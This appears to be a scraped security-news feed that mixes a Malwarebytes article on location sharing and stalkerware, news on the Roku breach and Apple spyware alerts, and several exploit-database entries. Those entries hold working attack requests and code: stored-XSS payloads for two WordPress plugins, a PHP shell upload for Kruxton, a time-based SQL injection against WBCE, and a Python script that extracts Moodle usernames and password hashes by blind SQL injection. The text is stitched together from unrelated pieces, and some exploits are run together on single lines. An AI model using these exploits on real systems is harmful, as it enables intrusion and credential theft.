Location sharing is popular among couples. But is it something you want in your own relationship?

Every relationship has its disagreements. Who takes out the trash and washes the dishes? Who plans the meals and writes out the grocery list? And when is it okay to start tracking one another’s location?  

Location sharing is becoming the norm between romantic partners—50% of people valued location sharing in their relationships, according to recent research from Malwarebytes—and plenty of couples have found ways to track one another’s location, with consent, in a respectful and transparent way.

But, as a cybersecurity, privacy, and identity protection company, Malwarebytes is concerned with risk, and location sharing carries significant risks within many types of relationships.

There are new relationships in which the rules around privacy and sharing are still being agreed upon, old relationships in which power imbalances are deeply entrenched, and, of course, abusive relationships in which non-consensual tracking and surveillance are used as levers of control.

As a company—and not a relationship counselor—Malwarebytes cannot endorse any reasons for location sharing between romantic partners. But Malwarebytes can provide guidance on what safe location sharing looks like, including a requirement for consent.

Importantly, Malwarebytes can also remind readers about one simple, often-forgotten fact in this conversation: You don’t have to engage in location sharing if you do not want to.

It really is as simple as that. Do not agree to location sharing in your relationship if:

*   You are being pressured, coerced, or harassed into sharing your location.
*   You do not trust or feel comfortable sharing your location with your partner.  
*   You do not want to.

As the reasons for location sharing are valid for many couples, the reasons against it are just as valid, too. You have the right to determine the rules in your own relationship, and that includes the digital decisions that impact your feelings of privacy, safety, and trust.

****Safety, security, and convenience****

According to research conducted last year by Malwarebytes, location tracking among partners is popular in North America—and even more popular amongst younger generations.

When polling more than 1,000 people about their attitudes and behaviors around online privacy and cybersecurity, a full 50% agreed or strongly agreed with the statement that “monitoring my spouse’s/significant other’s online activity and/or location makes me feel they are safer.”

Similarly, 42% agreed or strongly agreed with the statement that “being able to track my spouse’s/significant other’s location when they are away is extremely important to me.” This sentiment was higher amongst Gen Z—49% felt the same way compared to the general population.

As to why location tracking has become so popular, there is little doubt. It’s about safety (or, at least, the feeling of it).

On Reddit, the question of location tracking between partners is frequently posed and is just as frequently answered: “I think it should be fine for safety reasons,” said one user in a the most popular response to a thread.

In writing for the media platform Her Campus, one Pennsylvania State University student said that, if she already shares her location with her friends for safety, “why would I not share it with someone I am involved with romantically?”

For some of the editorial staff at the healthy living brand Poosh, location sharing also provided convenience.  

“If I want to call my boyfriend for something, sometimes I’ll check his location first (if he’s at the office, for example, I won’t call),” wrote Erika Harwood, managing editor. “Or if he tells me he’s on his way home and it seems to be taking unusually long, it’s easier to just check his location and see if he’s stuck in traffic.”

Harwood continued:

“Basically, it all boils down to me trying to eliminate as many phone calls from my day as possible.”

What these explanations all share is purpose and consent. The people featured here have told their partners about location sharing, and they have identified specific reasons to engage in this practice. Because of this, these situations are hardly cause for alarm.

What Malwarebytes hopes to draw attention to, however, are starkly different situations.

****Coercion, control, and crisis****

Location “sharing” implies two partners who consensually share their locations with one another. But as Malwarebytes discovered last year, location “sharing” isn’t the only activity that some people engage in—it’s also location spying.

According to the same survey last year, 41% of all people admitted to monitoring their partner in some way without their partner’s permission.

That includes 16% of people who non-consensually “tracked my spouse’s/significant other’s location through an app or Bluetooth tracker (like Apple AirTags, Tile, Find My)” and 13% who non-consensually “installed monitoring software/apps on spouse’s/significant other’s devices (e.g., Life360).”

The harms here are obvious.

Non-consensual location tracking in a relationship is a clear invasion of privacy. It puts sensitive information into one partner’s hands without the other partner knowing it, and the nature of the information itself can be used to harass and stalk someone—especially after a breakup.

Non-consensual location tracking is also present in domestic abuse, particularly in instances where one partner is being spied upon with the use of “stalkerware” apps. And while those who deploy these types of invasive apps are not guaranteed to be physically abusive against their partners, several documented cases highlight the risk.

As Danielle Citron, professor of law at UVA, wrote back in 2015 about what she called “cyber stalking apps”:

“A woman fled her abuser who was living in Kansas. Because her abuser had installed a cyber stalking app on her phone, her abuser knew that she had moved to Elgin, Illinois. He tracked her to a shelter and then a friend’s home where he assaulted her and tried to strangle her. In another case, a woman tried to escape her abusive husband, but because he had installed a stalking app on her phone, he was able to track down her and her children. The man murdered his two children. In 2013, a California man, using a spyware app, tracked a woman to her friend’s house and assaulted her.”

These cases may sound extreme, but they should not be ignored. They reveal that it isn’t location sharing itself which is harmful, but rather that harmful relationships will lead to harmful forms of location tracking.

Be sure that, if you do engage in location sharing, it is with someone who you trust, on both of your agreed terms, and in a way that you can turn off the location sharing at any point in the future.

****What’s the answer?****

Your real-time location is extraordinarily sensitive information, and as such, access to it should be understood as a privilege, not a right. No romantic partner has a “right” to your location just because their previous partners practiced location sharing. No romantic partner should coerce or harass you into location sharing. And no, the refusal to share your location, at any stage of the relationship, is not a “red flag.”

If you do decide to share your location with your partner, be sure to follow these guidelines:

*   **Have an open conversation about location sharing with one another**. You must obtain consent from your partner if you’re going to share your locations. Spying on your partner’s location without their consent is a breach of trust.
*   **Have a reason why you’re engaging in location sharing**. Many problems in a relationship will not be solved by location sharing. Have a firm reason why you want to share locations and what value it will provide. If you do not have a good reason, you may not need location sharing at all.
*   **Set up rules about location sharing**. Location sharing can be enabled on a case-by-case basis for, say, music festivals, vacations, or solo hiking trips. It can also be enabled between partners indefinitely.
*   **Check in periodically about whether it is working**. Just because you agreed to location sharing a year ago does not mean you cannot revisit the topic. See how location sharing feels and then see if you still want it later in your relationship.

As every couple has its own rules and behaviors for success, there is no single answer to whether you should share your location with your partner. You know your partner—and yourself—best to answer this question. Be safe, whatever option you choose.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Should you share your location with your partner? 

WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.1.1# Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w# Vulnerable Property at Request: videoFields[post_type]# Payload: <script>alert(document.cookie)</script># Request:POST /wp-admin/options.php HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 395Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=video_managerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, ioption_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

Kruxton version 1.0 suffers from a remote shell upload vulnerability.

## Title: kruxton-1.0-FileUpload-RCE  
## Author: nu11secur1ty  
## Date: 04/15/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The system setting with parameter IMG is vulnerable to File Upload  
vulnerability.  
The attacker can upload a very malicious PHP file into the server and  
then he can execute it  
This is a potential CRITICAL PROBLEM!

STATUS: HIGH- Vulnerability

[+]Payload:  
```POST  
POST /kruxton/ajax.php?action=save_settings HTTP/1.1  
Host: localpwnedhost.com  
Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;  
PHPSESSID=lp21rf44drtnogjboa8v7lpmg1  
Content-Length: 1043  
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"  
Accept: */*  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://localpwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=1, i  
Connection: close

------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="name"

Kruxton Bristo By Mayuri K  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="email"  
mayuri.infospace@gmail.com  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="contact"

9000000000  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="about"

<p>Kruxton Bristo By Mayuri K</p><p data-f-id="pbf" style="text-align:  
center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:  
sans-serif;">Powered by <a  
href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala  
Editor">Froala Editor</a></p>  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2024  
//Your malicious code here  
?>

------WebKitFormBoundaryUwsdkjlNQ5exBwrq--  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html)

## Time spent:  
00:15:00

Kruxton 1.0 Shell Upload

WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS   
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.

Function |addslashes()|   
(https://www.php.net/manual/en/function.addslashes.php) escapes only   
these characters and not a tick sign:

  * single quote (')  
  * double quote (")  
  * backslash ()  
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796  
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046  
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
  * https://pastebin.com/PBw5AvGp

WBCE 1.6.0 SQL Injection

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

Cybersecurity researchers have discovered a "renewed" cyber espionage campaign targeting users in South Asia with the aim of delivering an Apple iOS spyware implant called LightSpy.
"The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular framework with extensive spying features," the BlackBerry Threat Research and Intelligence Team said in a report published last

Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users

A list of topics we covered in the week of April 8 to April 14 of 2024

April 12, 2024 - Wondering whether changing your SSN is an option. Read here what you need to qualify for a new SSN and what you need to get one.

April 11, 2024 - Apple has sent alerts to people in 92 nations to say it's detected that they may have been a victim of a mercenary attack.

April 10, 2024 - Don't wait for an online harassment campaign to unfairly target you or a loved one. Take these proactive steps today to stay safe.

April 10, 2024 - Find out what sensitive data of yours is exposed online today with our new, free Digital Footprint Portal.

April 9, 2024 - A man has pleaded guilty to assuming someone else's identity for 35 years.

 A week in security (April 8 &#8211; April 14) 

Plus: Apple warns iPhone users about spyware attacks, CISA issues an emergency directive about a Microsoft breach, and a ransomware hacker tangles with an unimpressed HR manager named Beth.

After months of delays, the US House of Representatives voted on Friday to extend a controversial warrantless wiretap program for two years. Known as Section 702, the program authorizes the US government to collect the communications of foreigners overseas. But this collection also includes reams of communications from US citizens, which are stored for years and can later be warrantlessly accessed by the FBI, which has heavily abused the program. An amendment that would require investigators to obtain such a warrant failed to pass.

A group of US lawmakers on Sunday unveiled a proposal that they hope will become the country’s first nationwide privacy law. The American Privacy Rights Act would limit the data that companies can collect and give US residents greater control over the personal information that is collected about them. Passage of such legislation remains far off, however: Congress has attempted to pass a national privacy law for years and has thus far failed to do so.

Absent a US privacy law, you’ll need to take matters into your own hands. DuckDuckGo, the privacy-focused company famous for its search engine, now offers a new product called Privacy Pro that includes a VPN, a tool for having your data removed from people-search websites, and a service for restoring your identity if you fall victim to identity theft. There are also steps you can take to wrench back some of the data used to train generative AI systems. Not all systems out there offer the option to opt out of data collection, but we have a rundown of the ones that do and how to keep your data out of AI models.

Data collection isn’t the only risk associated with AI advancements. AI-generated scam calls are becoming more sophisticated, with cloned voices sounding eerily like the real thing. But there are precautions you can take to protect yourself from getting swindled by someone using AI to sound like a loved one.

Change Healthcare’s ongoing ransomware nightmare appears to have gotten worse. The company was originally targeted by a ransomware gang known as AlphV in February. But after the hackers received a $22 million payment early last month, a rift appeared to grow between AlphV and affiliate hackers, who say AlphV took the money and ran without paying other groups that helped them carry out the attack. Now, another ransomware group, RansomHub, claims it has terabytes of Change Healthcare’s data and is attempting to extort the company. Service disruptions caused by the ransomware attack have impacted healthcare providers and their patients across the US.

That’s not all. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The streaming video service Roku warned customers Friday that 576,000 accounts had been compromised, a breach it discovered in the midst of its investigation of a far smaller-scale intrusion that it dealt with in March. Roku said that rather than actually penetrating Roku’s own network through a security vulnerability, the hackers had carried out a “credential-stuffing” attack in which they tried passwords for users that had leaked elsewhere, thus breaking into accounts where users had reused those passwords. The company noted that in less than 400 cases, hackers had actually exploited their access to make purchases with the hijacked accounts. But the company nonetheless reset users’ passwords and is implementing two-factor authentication on all user accounts.

**Apple Notifies Users of Mercenary Spyware Infections**

Apple sent notices via email to users in 92 countries around the world this week, warning them that they had been targeted by sophisticated “mercenary spyware” and that their devices may be compromised. The notice stressed that the company had “high confidence” in this warning and urged potential hacking victims to take it seriously. In a status page update, it suggested that anyone who receives the warning contact the Digital Security Helpline of the nonprofit Access Now and enable Lockdown Mode for future protection. Apple didn’t offer any information publicly about who the hacking victims are, where they’re located, or who the hackers behind the attacks might be, though in its blog post, it compared the malware to the sophisticated Pegasus spyware sold by the Israeli hacking firm NSO Group. It wrote in its public support post that it’s warned users in a total of 150 countries about similar attacks since 2021.

**CISA Warns Federal Agencies to Look Out for Russian Hackers Stealing Emails**

April continues to be the cruelest month for Microsoft—or perhaps Microsoft’s customers. On the heels of a Cybersecurity Review Board report on Microsoft’s previous breach by Chinese state-sponsored hackers, the Cybersecurity and Infrastructure Security Agency (CISA) published a report this week warning federal agencies that their communications with Microsoft may have been compromised by a group known as APT29, Midnight Blizzard, or Cozy Bear, believed to work on behalf of Russia’s SVR foreign intelligence agency. “Midnight Blizzard’s successful compromise of Microsoft corporate email accounts and the exfiltration of correspondence between agencies and Microsoft presents a grave and unacceptable risk to agencies,” CISA said in the emergency directive. As recently as March, Microsoft said that it was still working to expel the hackers from its network.

**When a Ransomware Hacker Calls a Victim Company’s Front Desk**

As ransomware hackers seek new ways to bully their victims into giving in to their extortion demands, one group tried the novel approach of calling the front desk of the company it had targeted to verbally threaten its staff. Thanks to one HR manager named Beth, that tactic ended up sounding about as threatening as a clip from an episode of _The Office_.

TechCrunch describes a recording of the conversation, which a ransomware group calling itself Dragonforce posted to its dark-web site in a misguided attempt to pressure the victim company to pay. (TechCrunch didn’t identify the victim.) The call starts like any tedious attempt to find the right person after calling a company’s publicly listed phone number, as the hacker waits to speak to someone in “management.”

Eventually, Beth picks up and a somewhat farcical conversation ensues as she asks that the hacker explain the situation. When he threatens to make the company’s stolen data available for “fraudulent activities and for terrorism by criminals,” Beth responds “Oh, ok,” in an altogether unimpressed tone. She then asks if the data will be posted to “Dragonforce.com.” At another point, she notes to the increasingly frustrated hacker that recording their call is illegal in Ohio, and he responds, “Ma’am, I am a hacker. I don’t care about the law.” Finally, Beth refuses to negotiate with the hacker with a “Well, good luck,” to which the hacker responds, “Thank you, take care.”

Roku Breach Hits 567,000 Users

By Deeba Ahmed
Apple has issued iPhone security alerts to 92 countries, stating that their devices have been targeted by a mercenary spyware attack, expressing high confidence in the warning.
This is a post from HackRead.com Read the original post: iPhone Users in 92 Countries Targeted by Mercenary Spyware Attacks

Apple has issued security alerts to millions of iPhone users across 92 countries, stating that their devices are being targeted by mercenary spyware. The alerts suggest that the attack is likely targeting users based on their identity or activities.

Apple has been informing users of threats for years, targeting journalists and politicians in over 150 countries since 2021. Some users have found invasive Pegasus spyware on their iPhones, created by Israeli spyware maker NSO Group. However, the company hasn’t provided any official numbers in the current case.

Apple’s threat notification (Read Apple’s updated statement here)

****Apple Requests Users to Take It Seriously!****

As reported by The Economic Times, Apple has stated in the warning email that the attack is likely targeted due to specific characteristics or actions, urging users to take it seriously.

A targeted mercenary spyware attack could remotely access sensitive data, communications, or even the camera and microphone, according to Apple’s threat notification email.

Despite the Indian government’s opposition to security alerts by Apple, India is among the countries affected by this issue, and it’s unclear if US iPhone owners were targeted, as Apple hasn’t provided any further details.

Apple has sent multiple alerts to over 150 countries since 2021 and it previously sued Israeli firm NSO Group for aiding adversaries in targeting iPhone users. Moreover, Apple has been releasing iOS updates to address potential spyware attacks, often as emergency security measures, especially when an iPhone flaw is already being exploited.

If you have received this notification, remember that Apple has dedicated a page to offer guidance on changing passwords and enabling two-factor authentication to enhance security.

****What are Mercenary Attacks?****

Mercenary attacks are targeted spyware attacks, which are a unique type of cyberattacks that targets specific individuals based on their profession, social status, or access to sensitive information. They use sophisticated spyware, like Pegasus, to infiltrate devices and gather vast amounts of data.

These attacks, are expensive and require extensive resources to execute. Mercenary attacks are rare and complex cybercrimes, costing millions and targeting a small number of people worldwide, according to a company email.

Brian Higgins, security specialist at Comparitech commented on the issue. _“_There have been enough periodic Pegasus activations in recent years for those who are regularly targeted to hopefully have some kind of response or mitigation plans in place,_“_ he said.

_“_Most often journalists and activists in jurisdictions of risk are targeted as they are vulnerable to intervention, prosecution and attack by the regimes they challenge – and data harvested in these breaches can facilitate all of these activities,_“_ Brain warned.

_“_It’s rather a disappointing buck-passing exercise for Apple to direct them to a third party, non-profit Security Helpline, given the history of implications for individual targets in previous incidents. You’d think as proprietors of a vulnerable platform, they would offer to help out themselves._“_

1.  Apple Issues Urgent Security Patches for Zero-Day Flaws
2.  iLeakage Attack: Theft of Data from Apple’s Safari Browser
3.  QuaDream, Israeli iPhone hacking spyware firm, to shut down
4.  Fake Lockdown Mode Exposes iOS Users to Malware Attacks
5.  iPhone Spyware Exploits Obscure Chip Feature, Hits Researchers

iPhone Users in 92 Countries Targeted by Mercenary Spyware Attacks

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

Tag

#apple